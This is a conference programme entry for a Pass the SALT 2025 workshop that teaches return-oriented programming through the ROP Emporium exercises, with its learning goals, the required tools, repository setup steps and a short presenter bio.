PTS2025

ROPemporium party
2025-07-02, 09:15–12:15 (Europe/Paris), Room LW109

ROP (Return-Oriented Programming) is an essential technique for exploiting modern binary executables. The ROPEmporium website, (https://ropemporium.com/
) developed by Max Kemper, features a series of step-by-step exercises designed to help you discover the ROPEmporiumhttps://cfp.pass-the-salt.org/pts2025/me/submissions/RTTHMW/#nav-abstract-preview progressively.

The workshop offers a shared experience of these exercises


During this workshop, we'll work together to solve some of the exercises on the site.

The aim is to give you enough theoretical and practical knowledge to be able to extend the experience by doing all the exercises proposed afterwards.
The site offers exercises on intel x86-64, x86-32, ARM and MISP executables.

After a presentation of the platform, and the main concepts involved in ROP, you'll be able to learn from the exercises :

  • Get to grips with the tools to discover an initial function calling technique.
  • Call a function with a parameter already present in the executable.
  • Master the convention of passing parameters for more complex calls.
  • Learn how to place some data in the memory and pass it as a parameter
  • Search for usable gadgets when the most obvious are not available.
  • Finally, we'll create a slightly more complex ROP chain using a pivot technique.

As an epilogue, if time permits, we'll take a look at ARM binary exploitation with qemu, to encourage you to extend the experience.

The workshop is ideally aimed at people familiar with x86 assembler and the basics of binary exploitation with buffer overflow.

To carry out the exercises you will need a Linux machine with the following open-sources tools :
- gdb
- a gdb extension such as GEF or pwndbg
- python3
- pwntools
- radare2
- ropper ou ROPGadget
and optionally
- 32-bit libraries (libc6-i386)
- qemu

A docker image containing the required tools will be made available and its use encouraged.
Docker is therefore the main requisite.

By the way, to avoid clogging up the network and save time at the beginning of the workshop, please,
try to anticipate to download the materials :


git clone https://github.com/cdpointpoint/ropemporium_party.git

cd ropemporium_party

./run_ptsrew.sh
.

The run script will pull the 2 Go docker image the fist time.

It is also possible to follow the workshop without carrying out (all) the manipulations during the session and keep focus on explanations or exchanges.

Computer engineer since 1985 and security "expert" since around 1995 mainly for the CNAM (Caisse Nationale d'Assurance Maladie) institution.
Unfortunately, recently retired.